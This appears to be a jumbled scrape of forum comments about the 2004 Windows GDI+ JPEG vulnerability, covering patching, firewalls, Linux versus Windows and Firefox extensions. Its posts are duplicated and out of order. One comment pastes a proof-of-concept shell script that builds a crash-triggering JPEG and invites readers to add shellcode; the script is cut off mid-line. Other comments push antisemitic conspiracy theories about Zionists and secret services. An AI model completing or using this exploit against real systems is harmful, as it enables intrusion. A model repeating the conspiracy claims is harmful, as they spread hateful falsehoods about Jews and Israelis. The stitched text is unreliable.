PS Conclusions posited based on "unprofessional research and wild conjectures" are likely to cause much more harm than good. Is this really necessary? (not a flame - just an observation)
I want to drag this out as long as possible. Bring me my protractor.
While they do have antivirus software and the ability to restore systems to a clean state on boot, they don't believe in firewalls because they "keep them from running software they need to run" on user's computers (and I quote from two sources). As a result, the computers they supply us with and that we aren't allowed to patch or fix constantly have issues.
Any of you sysadmins out there know of a valid reason NOT to run a firewall in these days of worms and the like?
Folks, can we please not post a direct link without the disclaimer? It seems to me to be a bit beyond rude.
For the record, here's the disclaimer (which I find silly, but that's not the point, I didn't decide to take on the exposure of hosting this thing for the researchers who will need access):
I don't know much of Linux internals, but I don't think it is obvious that it is vulnerable just because programs can get confused by unexpected data.
and be done with the problem once and forever?
;)
No, seriously
Or at least create one that warns victims about the hole..
Well actually it might be good too, this will probably further hasten the fall of IE and windows.
I hear that if you look at the jpeg, then your phone rings and you hear a voice say "seven days."
to SP2.......... It's That simple, pimple-heads.
Be quick.
Sample squid code:
Or, more reasonable:
and stick 209.171.43.27 into that file (and all following IPs that will use that code).
Then use ClamAV to scan your squid-cache the next couple of days and remove infected files.
And I've already seen the first ones bumping into my virus scanners (which luckily have a patch for these malformed jpgs)...
Come on, mods, mod that up.
We need to fight that _all_ as fast as possible.
Banner Ads and other types of ads have been getting bigger and more complicated (pop ups with video and sound), so what is your favorite way to block out ads from the internet?
MS IE can filter out ads using the security and content options.
Is there any better third party product that strips out banners and '1x1 pixel bugs' etc?
Just don't allow Windows boxes on the network. Problem solved....
Think Deeply.
Ive taken this as a good opportunity to mail all my contacts who I know still use IE at the instance of corporate IT departments, asking them to suggest to their departments the immediate ability to install an alternative such as Firefox. Im sure many others here do something similar, but for any one who has not its situations like this which unfortunately can help us to promote a safer alternative browsing platform for all of us.
This is a conspiracy where the RIAA, the MPAA and the PPAA (P0 rn Photographers Assoc of America) have colluded in order to discredit Usenet!
Ignore their efforts! Usenet forever!
"Count on this: If any 'terrorism' happens in the next 5 weeks, you can be sure it will have been be aided and abetted by the US and/or Israeli secret services."
uhm, WHAT?!?!?
i agree with parent, GP is a paranoid conspiracy anti semitic nut.
We only count the "days vulnerable" between the time when Microsoft acknowledges the exploit, to the time a fix is announced.
So. What's the days vulnerable on this one?
Got mine ( the very same ! ) the same time.
Great little device with an extra 512 bar it great for all the people here !.
Okee useless post i know !.
But good choice anyway !
When I was at college, all of the computers ran nt 3.51. So It was a common occurnace to enter acomputer lab and see 1/4 of the computers sitting at the blue screen of death. There was a dramatic increase in quality when they upgraded all of the existing machines to NT4. Blue screens were very rare. Then again they waited for service pack 4 before upgradding, so I'm sure the previous versions were not as solid.
Well.. maybe. Or Maybe not. But Definitely not sort of.
This could possibly be the worst viruses yet!
Even MS Word's grammar feature would have caught this one...
There's been some discussion of the problems facing "fleet operators" due to this bug. It seems that various product teams have spewed so many private versions of the .DLLs all over users' systems that the people who maintain the security-patch list in XML just gave up. SMS won't detect the need for the patch, and neither will MBSA, I'm told. Whether SUS (standalone, not the Feature Pack for SMS) will is not yet clear.
Well, that's just dandy. I've got 200 machines that need patching and no centralized tools, maybe. Oh, joy.
Now I'm wondering how I'll ever trust those tools again.
--And you are a sputtering, pre-programmed fool. Anybody who has bothered to look beyond Fox and CNN will know; the Mossad is one of the most dangerous and prolific secret agencies on the planet; anybody who criticizes Israel in any significant way is asking for trouble. (Or air to surface missiles into their wheel chair.)
Seriously. Look beyond the prescribed. There are some very smart and very even-keeled people who, (unlike the shouting poster I'm responding to), are not filled with knee-jerk emotional buttons. These are people who have studied the many various issues, not with hate, but rather out of curiosity and a sense of responsibility to know what the truth is and to share it.
Look up: "Israeli Moving Companies" and "Dancing art students". Those two threads alone will pull an avalanche of data into your hands. --If you want to see it. --Don't stop on the first hysterical webpage and say, "See! I looked and it's all insane crap!" If you only want to see evidence to support your delusions, then that is certainly all you will find.
Michael Moore took a lot of care to avoid talking about the elephant in the living room with his latest film. He's no dolt; he knows that potato is just too hot. (That is, can you imagine an army of pre-programmed fools like the one I'm responding to burning copies of his film? I can.)
Despite the fact that the emotionally charged term, 'Anti-Semite' is growing less effective as rationality catches up to reality, I want to be clear:
I am not anti-semitic. I AM anti-Zionist. The Jews are caught in the cross-fire. The Semites, ALL Semites, both Jew and Arab, are the final target of this new World War. --You will probably not read a more essential and un-recognized truth for the rest of this year.
I've been saying it for several years, and now it's becoming very hard to ignore. . . WWII was a dry run. It's all starting to happen again.
JPEG viruses and plenty of tax-paid astro-turfing are par for this course. They only have to keep people confused and quiet for one more month and then guys like me can be arrested without hassle.
-FL
> I want to see what GraphicConverter does with this.
I'm not cruising the alt.binaries.erotica.* groups for the p0rn, I'm doing field research on this new trojan.Some mornings it's hardly worth chewing through the restraints to get out of bed.
... does this qualify as sabotage of Usenet by Micro$oft?
wow.. since all college studens know how to use linux.
Since the .net framework is listed as vulnerable and RSS readers typically use it, will they need
patching?
The developers have set up Doom3 and the The Sims 2 to run as "root" (Windows) for a very good reason, and it's not because of programming incompetence. The reason they have done this is because both games are considered "adult" and not to be played by kids. This is why you need admin priveledges, it's an attempt to "password protect" those games that are adult in nature. ICQ has explicitly stated, as a matter of fact, that this is why you need admin priveldges to run it.
"Implications", not "implementations". I noticed just after I hit Submit. Sorry; I just got up.
Worst. Post. Ever.
Is some freshman psychology major going to format their drive, back up all their files, and install Linux? No. Are they going to be able to use Linux? Doubtful. Is linux going to detect their generic sound cards and network adapters? Yeah, right. Are you going to have chaos and pissed off students? Yes. Are you going be the one to tell them they can't use their brand new Dell without totally fucking re-doing all of the software or are you going to tell them it's worthless and to go spend $1000 on a new Mac?
You are seriously fucking stupid. Start living in the real world.
Linux isn't vulnerable to this particular image. In this case it only affects Microsoft's software.
-1 FUD slinging
UNIX and Linux systems take the concept "code reuse" to heart.
/usr/lib directory all the apps were fixed too! (note that at the time, a few apps were found to have statically compiled in the zlib library, and those apps were patched to dynamically use the system zlib library from that point forward)
The benefits of code reuse are:
* Less disk space utilization
* Less memory utilization
* Easier and more comprehensive security fixes
The draw back is:
* Lots of interdependencies between apps and libraries
The RPM and DPKG packagement's main goals are to manage the dependencies that exist on the system so that the all dependencies are met, and to keep them met during upgrades, removals, and installations.
Note that RPM and DPKG aren't creating the dependency issue (again, the issue is a natural by-product of the code reuse), they are there to manage it. Many clueless people rant about RPM and DPKG, it is amusing.
The "easier and more comprehensive security fixes" benefit is a HUGE deal, and this JPEG GDI+ issue is a perfect example.
You might have patched the OS itself, but still have many applications themselves that are vulnerable because they have their own private copy.
This is because in the Windows world, the tradeoff was taken to not have library and application interdependencies (no code reuse), but instead have standalone application installs.
This has the drawbacks of:
* More disk space utilization
* More memory utilization
* Harder and incomplete security fixes
So, say it with me. Hurray for dependency hell!
Another example of Linux of code reuse benefiting Linux:
A year or so ago, there was discovered a flaw in the zlib compression/decompression library used by many, MANY applications in Linux. By updating that one library in the
They need to scrap windows, and use some of that $50 billion and start from the ground up.
Why haven't they adopted a "sandbox" paradigm for applications to run in? Yes it would be slower, but it couldn't be worse than these issues
Agreed. This has the potential to be abused in that one can find their page linked to a Slashdot story then modify the content of the page to fit an agenda. Nip the problem in the bud and kill the link now as an example.
Transparently proxy web access. Log access to the norton AV update site, just a timestamp and an IP. Then you have a log of IP addresses and whether they have Norton installed, and the last time they updated.
If they don't update every two weeks, then trigger the transparent proxy so that any access to anything other than the Norton update page and the local page for downloading NAV displays a static page that says "Your access is blocked until you update your AV software." Give them a download link to grab their copy from.
It seems to me that you have a perfectly legitimate right to restrict access to a commons only to people who have taken steps to not be a threat to others in that area. You can require people to get immunized before going on a trip where they'll be in close contact with other people, so it seems you can require people to immunize their computers before you let them use YOUR equipment to put them in close proximity to other people's equipment.
How long will it be before a bunch of students sue a university to recoup cleanup costs because the university did not exercise due diligence in maintaining a clean network, when doing so is clearly technically feasible.
I don't want to make you feel stupid, but the argument you present here is a actually a common misconception; I believed it once as well until I began to examine the puzzle more closely.
Try thinking of it this way. .
Your trying to discredit the idea of, "The Conspiracy," through ridicule (re, "CUCKOO, CUCKOO"), is in fact part of the very same 'Conspiracy'. --But you didn't take orders, nor did you receive an envelope from a shadowy figure. Still, this doesn't alter the fact that you are a part of a large group of people engendering a certain belief system, and that you are affecting how the world filters and perceives data and events. --If you get enough people doing as you do, repeating, "He's Crazy" often enough, then the perception is created of a sort of 'moral majority' at work. And people can be counted on in most cases to react in a few very specific ways;
-People, on a gut level, will Fear the ideas being ridiculed and want to look away or in fact join in the chorus of disagreement so as to be part of the 'popular' crowd and thus avoid being ostracized themselves. This social programming is typically installed during childhood on school yards, and it is one of the most powerful methods to control population behavior in use today.
That is, ridiculing and heaping social abuse upon a subject with enough strength will cause the rest of the world to look the other way. Almost every time. Amazing! And yet, where is the 'Vast Conspiracy?' to make this happen?
Oh, it's there. It's just far more effective than most people give it credit, and far more invisible. The interesting fact is that when it is in full effect, conspirators do not NEED to keep secrets because the population is actively, deliberately looking the other way.
That's why the points you raise about the impossibility of thousands of people keeping a secret, (while true!), is not an issue.
And let's look at an example of a recent 'conspiracy' which was caught, which has massive implications, and which everybody ignored, choosing instead to believe in the installed falsehood. .
--This recent story about Canwest Global [www.cbc.ca], which owns much of the news pie in Canada is an excellent example of a small number of people influencing millions in regard to the activities of Zionist Israel.
There are those two charged words; ask yourself. . . Are you reacting at this moment rationally or emotionally?
-FL
Interestingly, this is not wholly accurate. --It suggests that ALL Jews want to control everything, whereas my experience with Jews tells me that the power-mongers are, as in other nations, a small number of elite. Their supporters are either connected to that elite, or are, largely, programmed masses.
Zionism is masked as a Jewish creation. Zionism, after the history is examined, is clearly a manipulative force which has through many, many means, artificially created threats of all types to Jews in other nations, both direct and indirect, pushing them to re-locate to Israel. There is plenty of evidence of Zionist ties with the Third Reich and various non-Jewish power brokers such as Rothschildes, and of course, the US government.
The end goal, as I have said before, is to "Put all the eggs in one basket" to enable a more effective termination of the Jewish blood lines, and that this is one of the primary objectives to the coming World War.
The Jews are one of the most heavily manipulated groups on the planet, and one which is being herded ever closer toward self-destruction.
I don't see it as being avoidable at this point, but perhaps with continued warnings and muck-raking, some people living in Israel, or who are planning to move there, will wake up and perhaps manage to avoid the hammer before it falls.
-FL
I welcome it! But please, be sure to also review and include the other two or three comments I've made in responses to the others who commented on my post.
--I think it may be very likely that you are jumping to conclusions regarding my intent and beliefs. In any case, I'd be fascinated to know what your teacher's take would be.
-FL
If I'm not mistaken, in Outlook 2003, when it asks you to create a PST file you can do either the older 97-2002 with the 2gb limit or the 20gb PST file that only 2003 can do.
Forcing your customers to run a less secure system as a way of enforcing the 'adult' rating sounds like a dumb idea, oh and by the way I'm feeling cynical, and I'm a developer myself, so I'll just go ahead and say that I'm 99% sure this stuff is total garbage - it's just that they couldn't be bothered to make the games run if you're not admin.
I bet that problem was found in beta-testing for both games, and they decided not to fix it, and cooked up some bollocks about won't somebody please think of the children instead.
It's not due to programming incompetence per se - I'm guessing timescales/perceived small scale of the problem caused it not to be fixed.
Cynical old me :)
See http://www.openwall.com/advisories/OW-002-netscape -jpeg/.
I meant Sirius.
no it has the 2gb limit as well. i dont know where there is a setting to enable some other amount of space.
.pst file thats horribly corrupted (well its actually "fixed" acording to microsoft as Outlook locks the file so that it wont actually corrupt, i can not however delete any messages out of it or anything)
this is due to the 2gb bug that effects most 32bit things (ie its all 1's). i just coincidentally enough, ran across this problem with a user this morning. i am thinking of switching him to thunderbird but there is no calendar and lord knows no one can work without a calendar!
i have a 1.9gb
theres a tool that lobotomizes like 50megs RANDOMLY out of the store file which would presumeably allow you to get in there and delete messages. i havent tried it yet.
(horribly offtopic i know)
I'll just use my special getting high powers one more time...
check the timestamps, assholes
er... need more information. Are you saying that the plugin format is already backwards compatible, and I need to adjust a setting? Or are you suggesting that the Mozilla team work on making the plugin format backwards compatible?
What if the extension is affected by the vunerability?
If you don't know what I'm talking about... http://news.google.com/news?q=jpeg+virus Anyway, since it's out there now I was doing some reading on Slashdot and found out a little bit of how it works. The article said to check to see if you have been infected by this trojan, look for a director named c:\windows\system32\system\ that has nvsvc.exe and winrun.exe in it. I didn't but how many images do you browse a day? So this one's making me a little nervous. I don't know if this will work but I think it definitely should. I went to the command prompt and did the following: cd\windows cd system32 md system cd system copy con > nvsvc.exe hkjhgkjh Ctrl+C copy con > winrun.exe iohgihgo Ctrl+C attrib *.* +r +s exit
It's a perfect time for being wasted.
A perfect time to watch the stars.
- Burden Brothers, "Beautiful Night"
Anyway, since it's out there now I was doing some reading on Slashdot and found out a little bit of how it works. The article said to check to see if you have been infected by this trojan, look for a director named c:\windows\system32\system\ that has nvsvc.exe and winrun.exe in it. I didn't but how many images do you browse a day? So this one's making me a little nervous. I don't know if this will work but I think it definitely should.
I went to the command prompt and did the following:
cd\windows
cd system32
md system
cd system
copy con > nvsvc.exe
hkjhgkjh Ctrl+C
copy con > winrun.exe
iohgihgo Ctrl+C
attrib *.* +r +s
exit
It's a perfect time for being wasted.
A perfect time to watch the stars.
- Burden Brothers, "Beautiful Night"
I don't think it's a matter of making the format backwards compatible (I'm sure it already is, from 0.7 at least). Pretty sure most extensions are compatible, just that the devs only sanction them up to the current ff/moz version because that's all they've tested on. You could edit the source yourself... Anyhow I agree that it sucks, I lost quite a few useful extension too bugmenot (but I can use the webpage) and quicknote (which really sucks because I used that a lot), and javascript console viewer (which isn't so useful since I'm not using js anymore).
.xpi file and rename it to a zip, extract the install.rdf file and open it with a text editor. There you can edit the maxversion, then put the new install.rdf back in the zip, rename it back to xpi and open with firefox. Of course you use this at your own risk because something *might* have been broken between versions.
If you like you can edit the extension to be compatible, download the
Hopefully now we've hit the 1.0 series the extensions can be made compatible for all 1.x versions.
He who defends everything, defends nothing. -- Fredrick The Great
Proof of concept exploit that creates a jpeg image to test for the buffer overrun vulnerability discovered under Microsoft Windows. Shellcode and valid addresses have been removed. /* CAN-2004-0200 */
#!/bin/sh
#
# The JPEG vuln is triggered by the 0 or 1 length field with an integer flaw
# The crafted JPEG header makes Windows crash a couple of different ways
# 1) First, it crashes when the image is opened.
# 2) Second, it crashes when hovering the mouse over the image.
#
# The pointer overwrite is pretty straight forward in a debugger
#
# Usage:
# sh ms04-028.sh > clickme.jpg
#
# Note: This isn't a ./hack
# - Plug in shellcode and get the address
# - You non-kiddies out there are smart enough to fill in the blanks
# - Until you do the above, it's just a stupid PoC crash
#
# It's ugly, but it works :)
#
# -perplexy-
#JPEG header 'n stuff
printf "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46"
printf "\x00\x01\x01\x01\x00\x60\x00\x60\x00\x00"
#Trigger string - 00 length field (01 works too)
printf "\xFF\xFE\x00\x00"
printf "\x45\x78\x69\x66\x00\x00\x49\x49\x2A\x00\x08\x00"
# 1) Opening directly in IE
#Address to overwrite = RtlEnterCriticalSelection() - 4
#Check page 172 of SC Handbook for those of you playing along at home
printf "\x1C\xF0\xFD\x7F"
# 1) Opening directly in IE
#Address of shellcode
printf "\x41\x41\x41\x41"
#Other stuff
printf "\x96\x02\x00\x00\x1A\x00\x00\x00"
# 2) MouseOver in IE
#Address to overwrite = RtlEnterCriticalSelection() - 4
#Check page 172 of SC Handbook for those of you playing along at home
printf "\x1C\xF0\xFD\x7F";
# 2) MouseOver in IE
#Address of shellcode
printf "\x41\x41\x41\x41"
#Comments here
perl -e 'print "A"x1000';
#Image junk here
printf "\x00\x00\x00\xFF\xDB\x00\x43\x00\x08\x06\x06\x07\ x06\x05\x08\x07\x07";
printf "\x07\x09\x09\x08\x0A\x0C\x14\x0D\x0C\x0B\x0B\x0C\ x19\x12\x13\x0F\x14";
printf "\x1D\x1A\x1F\x1E\x1D\x1A\x1C\x1C\x20\x24\x2E\x27\ x20\x22\x2C\x23\x1C";
printf "\x1C\x28\x37\x29\x2C\x30\x31\x34\x34\x34\x1F\x27\ x39\x3D\x38\x32\x3C";
printf "\x2E\x33\x34\x32\xFF\xDB\x00\x43\x01\x09\x09\x09\ x0C\x0B\x0C\x18\x0D";
printf "\x0D\x18\x32\x21\x1C\x21\x32\x32\x32\x32\x32\x32\ x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\ x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\ x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\xFF\xC0\x00\x11\x08\x00\x03\ x00\x03\x03\x01\x22";
printf "\x00\x02\x11\x01\x03\x11\x01\xFF\xC4\x00\x1F\x00\ x00\x01\x05\x01\x01";
printf "\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\ x01\x02\x03\x04\x05";
printf "\x06\x07\x08\x09\x0A\x0B\xFF\xC4\x00\xB5\x10\x00\ x02\x01\x03\x03\x02";
printf "\x04\x03\x05\x05\x04\x04\x00\x00\x01\x7D\x01\x02\ x03\x00\x04\x11\x05";
printf "\x12\x21\x31\x41\x06\x13\x51\x61\x07\x22\x71\x14\ x32\x81\x91\xA1\x08";
printf "\x23\x42\xB1\xC1\x15\x52\xD1\xF0\x24\x33\x62\x72\ x82\x09\x0A\x16\x17";
printf "\x18\x19\x1A\x25\x26\x27\x28\x29\x2A\x34\x35\x36\ x37\x38\x39\x3A\x43";
printf "\x44\x45\x46\x47\x48\x49\x4A\x53\x54\x55\x56\x57\ x58\x59\x5A\x63\x64";
printf "\x65\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77\x78\ x79\x7A\x83\x84\x85";
printf "\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97\x98\ x99\x9A\xA2\xA3\xA4";
printf "\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\ xB8\xB9\xBA\xC2\xC3";
printf "\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\ xD7\xD8\xD9\xDA\xE1";
printf "\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xF1\xF2\xF3\ xF4\xF5\xF6\xF7\xF8";
printf "\xF9\xFA\xFF\xC4\x00\x1F\x01\x00\x03\x01\x01\x01\ x01\x01\x01\x01\x01";
printf "\x01\x00\x00\x00\x00\x00\x00
umm.. isn't college for learning?
...these aren't my real teeth.
I mean that firefox should (within reason) retain your previous plugins when you perform an upgrade..
It may do now.. havent upgraded in a while (since before they had pretty installers and such)..
Of course if you have a plugin that relies on said vulnerability, the plugin no longer runs correctly.. but I think the chances of this are relatively slim..
I've actually been holding off upgrading because I hate trying to find and install all the plugins again (especially the good version of Adblock!!)..
i hate pansy republicans
I mean that firefox should (within reason) retain your previous plugins when you perform an upgrade..
Oh, it retained them, they just didn't work. I tried upgrading them through the extensions manager, but eventually I had to go looking for them.
Of course if you have a plugin that relies on said vulnerability, the plugin no longer runs correctly.. but I think the chances of this are relatively slim..
Right, but how would Firefox know which plug-ins were affected by the vunerablity and which were not? DO the plug-ins only call the Firefox API, or do some of them hav their own API.
For example, one of the extensions I use is Image Zoom. Was this extension affected by the JPEG vunerability? And if yes, will updating Firefox fix the vunerablity in the extension too?
I've actually been holding off upgrading because I hate trying to find and install all the plugins again (especially the good version of Adblock!!)..
I'm still waiting on Moji, Basics and Bloglines toolkit.
Gees you guys don't get it when someone is supposed to be funny? But also its not impossible to do this in the real world. There is a security company that does not allow windows machines to connect to its corporate network at all. In the Real world the school can require the students to buy a particular computer. It might be a windows box, an Apple, or linux. I remember a school that required all CS students to have an Amiga!!
Think Deeply.
Right, but how would Firefox know which plug-ins were affected by the vunerablity and which were not? DO the plug-ins only call the Firefox API, or do some of them hav their own API.
For example, one of the extensions I use is Image Zoom. Was this extension affected by the JPEG vunerability? And if yes, will updating Firefox fix the vunerablity in the extension too?
That's a very very interesting question
i hate pansy republicans
To the person who modded the parent post down from Funny 2 to 0 and all the replys from 2, 3,and 4 down to 0, -1 and offtopic. Eat shit.
If you could reason with religious people, there would be no religious people